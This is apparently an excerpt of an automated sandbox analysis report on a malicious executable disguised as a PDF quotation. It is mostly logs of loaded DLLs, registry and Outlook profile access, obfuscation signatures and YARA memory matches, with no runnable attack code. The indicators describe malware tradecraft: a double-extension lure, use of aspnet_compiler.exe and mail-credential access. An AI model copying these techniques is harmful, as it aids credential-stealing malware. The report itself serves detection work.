              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: Yara matchFile source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.119775b0000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196edbfa50.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2653712164.00000119775B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe PID: 2132, type: MEMORYSTR
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF848F480FB push ebx; ret 0_2_00007FF848F4816A
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF848F419BD push E95D7018h; ret 0_2_00007FF848F419F9
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF848F4FCE4 pushfd ; retf 0_2_00007FF848F4FCEB
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF84915539D push eax; iretd 0_2_00007FF8491555DD
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
